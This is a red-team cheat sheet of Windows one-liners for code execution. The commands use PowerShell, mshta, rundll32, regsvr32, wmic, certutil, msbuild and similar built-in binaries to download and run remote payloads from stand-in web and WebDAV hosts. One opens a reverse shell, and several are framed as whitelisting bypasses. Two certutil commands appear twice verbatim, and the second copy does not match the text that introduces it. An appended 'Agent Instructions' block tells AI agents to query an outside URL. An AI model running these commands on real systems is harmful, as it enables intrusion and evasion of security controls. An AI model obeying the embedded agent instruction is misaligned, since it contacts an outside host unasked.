# Oneliners for Code Execution ### PowerShell ``` powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443 ``` ``` powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex ``` But you can also call the payload directly from a WebDAV server: ``` powershell -exec bypass -f \\webdavserver\folder\payload.ps1 ``` ### Cmd Check out the great work by Arno0x with ***Invoke-EmbedInBatch.ps1*** script (*heavily inspired by @xorrior work*), and see that you can easily execute any binary, dll, script: {% embed url="" %} ``` cmd.exe /k < \\webdavserver\folder\batchfile.txt ``` ### Cscript/Wscript ``` cscript //E:jscript \\webdavserver\folder\payload.txt ``` ### Mshta ``` mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) ``` As seen in the koadic framework mshta accepts a URL as an argument to execute an HTA file: ``` mshta http://webserver/payload.hta ``` ### Rundll32 {% tabs %} {% tab title="UNC Path" %} ``` rundll32 \\webdavserver\folder\payload.dll,entrypoint ``` {% endtab %} {% tab title="Jscript" %} ``` rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script: http://webserver/payload.sct");window.close(); ``` {% endtab %} {% endtabs %} ### Wmic ``` wmic os get /format:"https://webserver/payload.xsl" ``` ### Regasm/Regsvc Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (*can be written in .Net/C#*) that will expose the proper interfaces, and you can then call it over WebDAV: ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll ``` ### Regsvr32 Another one from @subTee. This ones requires a slightly different *scriptlet* from the mshta one above. First option: ``` regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll ``` Second option using UNC/WebDAV: ``` regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll ``` ### Odbcconf To be noted is that the DLL file doesn’t need to have the *.dll* extension. It can be downloaded using UNC/WebDAV: ``` odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} ``` ### Msbuild ``` cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" ``` ### Certutil Great work by @subTee for discovering this: ``` certutil -urlcache -split -f http://webserver/payload payload ``` Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload: ``` certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll ``` You could simply deliver an executable: ``` certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll ``` This information was referenced from: {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.dev4cloud.net/cheetsheets/oneliners-for-code-execution.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.